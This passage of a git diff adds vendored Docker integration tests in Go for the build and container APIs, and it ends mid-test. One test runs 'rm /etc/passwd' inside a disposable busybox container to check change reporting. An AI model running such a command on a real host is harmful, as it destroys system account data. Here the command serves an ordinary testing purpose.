-name ba* +RUN find /tmp/` + } + server, err := fakeStorage(map[string]string{"testD": testD}) + c.Assert(err, checker.IsNil) + defer server.Close() + + res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + // Make sure Dockerfile exists. 
+ // Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL + out := string(buf) + c.Assert(out, checker.Contains, "/tmp/Dockerfile") + c.Assert(out, checker.Not(checker.Contains), "baz") +} + +func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte("FROM busybox") + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, checker.IsNil) + + defer server.Close() + + res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + b.Close() +} + +func (s *DockerSuite) TestBuildAPIRemoteTarballContextWithCustomDockerfile(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox +RUN echo 'wrong'`) + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + custom := []byte(`FROM busybox +RUN echo 'right' +`) + err = tw.WriteHeader(&tar.Header{ + Name: "custom", + Size: int64(len(custom)), + }) + + // failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(custom) + // failed to write tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + server, 
err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, checker.IsNil) + + defer server.Close() + url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar" + res, body, err := sockRequestRaw("POST", url, nil, "application/tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + defer body.Close() + content, err := readBody(body) + c.Assert(err, checker.IsNil) + + // Build used the wrong dockerfile. + c.Assert(string(content), checker.Not(checker.Contains), "wrong") +} + +func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) { + git, err := newFakeGit("repo", map[string]string{ + "dockerfile": `FROM busybox +RUN echo from dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from dockerfile") +} + +func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) { + git, err := newFakeGit("repo", map[string]string{ + "baz": `FROM busybox +RUN echo from baz`, + "Dockerfile": `FROM busybox +RUN echo from Dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + // Make sure it tries to 'dockerfile' query param value + res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from baz") +} + +func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) { + testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows + git, err := newFakeGit("repo", 
map[string]string{ + "Dockerfile": `FROM busybox +RUN echo from Dockerfile`, + "dockerfile": `FROM busybox +RUN echo from dockerfile`, + }, false) + c.Assert(err, checker.IsNil) + defer git.Close() + + // Make sure it tries to 'dockerfile' query param value + res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + buf, err := readBody(body) + c.Assert(err, checker.IsNil) + + out := string(buf) + c.Assert(out, checker.Contains, "from Dockerfile") +} + +func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { + // Make sure that build context tars with entries of the form + // x/./y don't cause caching false positives. + + buildFromTarContext := func(fileContents []byte) string { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox + COPY dir /dir/`) + err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }) + //failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(dockerfile) + // failed to write Dockerfile in tar file content + c.Assert(err, checker.IsNil) + + err = tw.WriteHeader(&tar.Header{ + Name: "dir/./file", + Size: int64(len(fileContents)), + }) + //failed to write tar file header + c.Assert(err, checker.IsNil) + + _, err = tw.Write(fileContents) + // failed to write file contents in tar file content + c.Assert(err, checker.IsNil) + + // failed to close tar archive + c.Assert(tw.Close(), checker.IsNil) + + res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := readBody(body) + c.Assert(err, checker.IsNil) + lines := strings.Split(string(out), "\n") + c.Assert(len(lines), checker.GreaterThan, 1) + c.Assert(lines[len(lines)-2], checker.Matches, 
".*Successfully built [0-9a-f]{12}.*") + + re := regexp.MustCompile("Successfully built ([0-9a-f]{12})") + matches := re.FindStringSubmatch(lines[len(lines)-2]) + return matches[1] + } + + imageA := buildFromTarContext([]byte("abc")) + imageB := buildFromTarContext([]byte("def")) + + c.Assert(imageA, checker.Not(checker.Equals), imageB) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go new file mode 100644 index 0000000000..d046ec0684 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go @@ -0,0 +1,1961 @@ +package main + +import ( + "archive/tar" + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httputil" + "net/url" + "os" + "path/filepath" + "regexp" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) { + startCount, err := getContainerCount() + c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count")) + + name := "getall" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var inspectJSON []struct { + Names []string + } + err = json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body")) 
+ + c.Assert(inspectJSON, checker.HasLen, startCount+1) + + actual := inspectJSON[0].Names[0] + c.Assert(actual, checker.Equals, "/"+name) +} + +// regression test for empty json field being omitted #13691 +func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { + dockerCmd(c, "run", "busybox", "true") + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + // empty Labels field triggered this bug, make sense to check for everything + // cause even Ports for instance can trigger this bug + // better safe than sorry.. + fields := []string{ + "Id", + "Names", + "Image", + "Command", + "Created", + "Ports", + "Labels", + "Status", + "NetworkSettings", + } + + // decoding into types.Container do not work since it eventually unmarshal + // and empty field to an empty go map, so we just check for a string + for _, f := range fields { + if !strings.Contains(string(body), f) { + c.Fatalf("Field %s is missing and it shouldn't", f) + } + } +} + +type containerPs struct { + Names []string + Ports []map[string]interface{} +} + +// regression test for non-empty fields from #13901 +func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) { + // Problematic for Windows porting due to networking not yet being passed back + testRequires(c, DaemonIsLinux) + name := "pstest" + port := 80 + runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port)) + + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var resp []containerPs + err = json.Unmarshal(body, &resp) + c.Assert(err, checker.IsNil) + + var foundContainer *containerPs + for _, container := range resp { + for _, testName := range container.Names { + if "/"+name == testName { + foundContainer = &container + break + } + } + } + + c.Assert(foundContainer.Ports, checker.HasLen, 1) + 
c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port)) + _, ok := foundContainer.Ports[0]["PublicPort"] + c.Assert(ok, checker.Not(checker.Equals), true) + _, ok = foundContainer.Ports[0]["IP"] + c.Assert(ok, checker.Not(checker.Equals), true) +} + +func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { + // Not supported on Windows as Windows does not support docker export + testRequires(c, DaemonIsLinux) + name := "exportcontainer" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test") + + status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + found := false + for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + h, err := tarReader.Next() + if err != nil && err == io.EOF { + break + } + if h.Name == "test" { + found = true + break + } + } + c.Assert(found, checker.True, check.Commentf("The created test file has not been found in the exported image")) +} + +func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) { + // Not supported on Windows as Windows does not support docker diff (/containers/name/changes) + testRequires(c, DaemonIsLinux) + name := "changescontainer" + dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd") + + status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + changes := []struct { + Kind int + Path string + }{} + c.Assert(json.Unmarshal(body, &changes), checker.IsNil, check.Commentf("unable to unmarshal response body")) + + // Check the changelog for removal of /etc/passwd + success := false + for _, elem := range changes { + if elem.Path == "/etc/passwd" && elem.Kind == 2 { + success = true + } + } + c.Assert(success, checker.True, check.Commentf("/etc/passwd has been removed but is not present in the diff")) +} + +func (s *DockerSuite) TestGetContainerStats(c 
*check.C) { + var ( + name = "statscontainer" + ) + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + var s *types.Stats + // decode only one object from the stream + c.Assert(dec.Decode(&s), checker.IsNil) + } +} + +func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + + buf := &integration.ChannelBuffer{make(chan []byte, 1)} + defer buf.Close() + + _, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json") + c.Assert(err, checker.IsNil) + defer body.Close() + + chErr := make(chan error, 1) + go func() { + _, err = io.Copy(buf, body) + chErr <- err + }() + + b := make([]byte, 32) + // make sure we've got some stats + _, err = buf.ReadTimeout(b, 2*time.Second) + c.Assert(err, checker.IsNil) + + // Now remove without `-f` and make sure we are still pulling stats + _, _, err = dockerCmdWithError("rm", id) + c.Assert(err, checker.Not(checker.IsNil), check.Commentf("rm should have failed but didn't")) + _, err = buf.ReadTimeout(b, 2*time.Second) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", id) + c.Assert(<-chErr, checker.IsNil) +} + +// regression test for gh13421 +// previous test was just checking one stat entry so it didn't fail 
(stats with +// stream false always return one stat) +func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { + name := "statscontainer" + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. + select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + s := string(sr.body) + // count occurrences of "read" of types.Stats + if l := strings.Count(s, "read"); l < 2 { + c.Fatalf("Expected more than one stat streamed, got %d", l) + } + } +} + +func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { + name := "statscontainer" + runSleepingContainer(c, "--name", name) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil) + bc <- b{status, body, err} + }() + + // allow some time to stream the stats from the container + time.Sleep(4 * time.Second) + dockerCmd(c, "rm", "-f", name) + + // collect the results from the stats stream or timeout and fail + // if the stream was not disconnected. 
+ select { + case <-time.After(2 * time.Second): + c.Fatal("stream was not closed after container was removed") + case sr := <-bc: + c.Assert(sr.err, checker.IsNil) + c.Assert(sr.status, checker.Equals, http.StatusOK) + + s := string(sr.body) + // count occurrences of `"read"` of types.Stats + c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`))) + } +} + +func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { + name := "statscontainer" + dockerCmd(c, "create", "--name", name, "busybox", "ps") + + type stats struct { + status int + err error + } + chResp := make(chan stats) + + // We expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine + // below we'll check this on a timeout. + go func() { + resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "") + body.Close() + chResp <- stats{resp.StatusCode, err} + }() + + select { + case r := <-chResp: + c.Assert(r.err, checker.IsNil) + c.Assert(r.status, checker.Equals, http.StatusOK) + case <-time.After(10 * time.Second): + c.Fatal("timeout waiting for stats response for stopped container") + } +} + +func (s *DockerSuite) TestContainerAPIPause(c *check.C) { + // Problematic on Windows as Windows does not support pause + testRequires(c, DaemonIsLinux) + defer unpauseAllContainers() + out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30") + ContainerID := strings.TrimSpace(out) + + status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pausedContainers, err := getSliceOfPausedContainers() + c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + + if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] { + c.Fatalf("there should be one paused container 
and not %d", len(pausedContainers)) + } + + status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pausedContainers, err = getSliceOfPausedContainers() + c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container.")) +} + +func (s *DockerSuite) TestContainerAPITop(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "top") + id := strings.TrimSpace(string(out)) + c.Assert(waitRun(id), checker.IsNil) + + type topResp struct { + Titles []string + Processes [][]string + } + var top topResp + status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(json.Unmarshal(b, &top), checker.IsNil) + c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles)) + + if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" { + c.Fatalf("expected `USER` at `Titles[0]` and `COMMAND` at Titles[10]: %v", top.Titles) + } + c.Assert(top.Processes, checker.HasLen, 2, check.Commentf("expected 2 processes, found %d: %v", len(top.Processes), top.Processes)) + c.Assert(top.Processes[0][10], checker.Equals, "/bin/sh -c top") + c.Assert(top.Processes[1][10], checker.Equals, "top") +} + +func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := runSleepingContainer(c, "-d") + id := strings.TrimSpace(string(out)) + c.Assert(waitRun(id), checker.IsNil) + + type topResp struct { + Titles []string + Processes [][]string + } + var top topResp + status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, 
checker.Equals, http.StatusOK) + c.Assert(json.Unmarshal(b, &top), checker.IsNil) + c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles)) + + if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" { + c.Fatalf("expected `Name` at `Titles[0]` and `Private Working Set` at Titles[3]: %v", top.Titles) + } + c.Assert(len(top.Processes), checker.GreaterOrEqualThan, 2, check.Commentf("expected at least 2 processes, found %d: %v", len(top.Processes), top.Processes)) + + foundProcess := false + expectedProcess := "busybox.exe" + for _, process := range top.Processes { + if process[0] == expectedProcess { + foundProcess = true + break + } + } + + c.Assert(foundProcess, checker.Equals, true, check.Commentf("expected to find %s: %v", expectedProcess, top.Processes)) +} + +func (s *DockerSuite) TestContainerAPICommit(c *check.C) { + cName := "testapicommit" + dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") + + name := "testcontainerapicommit" + status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type resp struct { + ID string + } + var img resp + c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + cmd := inspectField(c, img.ID, "Config.Cmd") + c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) + + // sanity check, make sure the image is what we think it is + dockerCmd(c, "run", img.ID, "ls", "/test") +} + +func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { + cName := "testapicommitwithconfig" + dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") + + config := map[string]interface{}{ + "Labels": map[string]string{"key1": "value1", "key2": "value2"}, + } + + name := "testcontainerapicommitwithconfig" + status, b, err := 
sockRequest("POST", "/commit?repo="+name+"&container="+cName, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type resp struct { + ID string + } + var img resp + c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1") + c.Assert(label1, checker.Equals, "value1") + + label2 := inspectFieldMap(c, img.ID, "Config.Labels", "key2") + c.Assert(label2, checker.Equals, "value2") + + cmd := inspectField(c, img.ID, "Config.Cmd") + c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) + + // sanity check, make sure the image is what we think it is + dockerCmd(c, "run", img.ID, "ls", "/test") +} + +func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) { + // TODO Windows to Windows CI - Port this test + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "echo test"}, + "PortBindings": map[string]interface{}{ + "8080/tcp": []map[string]interface{}{ + { + "HostIP": "", + "HostPort": "aa80", + }, + }, + }, + } + + jsonData := bytes.NewBuffer(nil) + json.NewEncoder(jsonData).Encode(config) + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body)) +} + +func (s *DockerSuite) TestContainerAPICreate(c *check.C) { + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", "touch /test && ls /test"}, + } + + status, b, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + type createResp struct { + ID string + } + var container createResp + c.Assert(json.Unmarshal(b, 
&container), checker.IsNil) + + out, _ := dockerCmd(c, "start", "-a", container.ID) + c.Assert(strings.TrimSpace(out), checker.Equals, "/test") +} + +func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) { + config := map[string]interface{}{} + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + expected := "Config cannot be empty in order to create a container" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) +} + +func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) { + // Container creation must fail if client specified configurations for more than one network + config := map[string]interface{}{ + "Image": "busybox", + "NetworkingConfig": networktypes.NetworkingConfig{ + EndpointsConfig: map[string]*networktypes.EndpointSettings{ + "net1": {}, + "net2": {}, + "net3": {}, + }, + }, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + msg := getErrorMessage(c, body) + // network name order in error message is not deterministic + c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints") + c.Assert(msg, checker.Contains, "net1") + c.Assert(msg, checker.Contains, "net2") + c.Assert(msg, checker.Contains, "net3") +} + +func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) { + hostName := "test-host" + config := map[string]interface{}{ + "Image": "busybox", + "Hostname": hostName, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", 
nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) +} + +func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) { + domainName := "test-domain" + config := map[string]interface{}{ + "Image": "busybox", + "Domainname": domainName, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname")) +} + +func (s *DockerSuite) TestContainerAPICreateBridgeNetworkMode(c *check.C) { + // Windows does not support bridge + testRequires(c, DaemonIsLinux) + UtilCreateNetworkMode(c, "bridge") +} + +func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) { + // Windows does not support these network modes + testRequires(c, DaemonIsLinux, NotUserNamespace) + UtilCreateNetworkMode(c, "host") + UtilCreateNetworkMode(c, "container:web1") +} + +func UtilCreateNetworkMode(c *check.C, networkMode string) { + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{"NetworkMode": networkMode}, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container 
containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode")) +} + +func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) { + // TODO Windows to Windows CI. The CpuShares part could be ported. + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "CpuShares": 512, + "CpusetCpus": "0", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + + out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares") + c.Assert(out, checker.Equals, "512") + + outCpuset := inspectField(c, containerJSON.ID, "HostConfig.CpusetCpus") + c.Assert(outCpuset, checker.Equals, "0") +} + +func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) { + config := map[string]interface{}{ + "Image": "busybox", + } + + create := func(ct string) (*http.Response, io.ReadCloser, error) { + jsonData := bytes.NewBuffer(nil) + c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil) + return sockRequestRaw("POST", "/containers/create", jsonData, ct) + } + + // Try with no 
content-type + res, body, err := create("") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + body.Close() + + // Try with wrong content-type + res, body, err = create("application/xml") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + body.Close() + + // now application/json + res, body, err = create("application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) + body.Close() +} + +//Issue 14230. daemon should return 500 for invalid port syntax +func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "NetworkMode": "default", + "PortBindings": { + "19039;1230": [ + {} + ] + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "invalid port") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "something", + "MaximumRetryCount": 0 + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "invalid restart policy") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "always", + "MaximumRetryCount": 2 + } + } + }` + + res, body, err := 
sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be used with restart policy") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "on-failure", + "MaximumRetryCount": -2 + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + 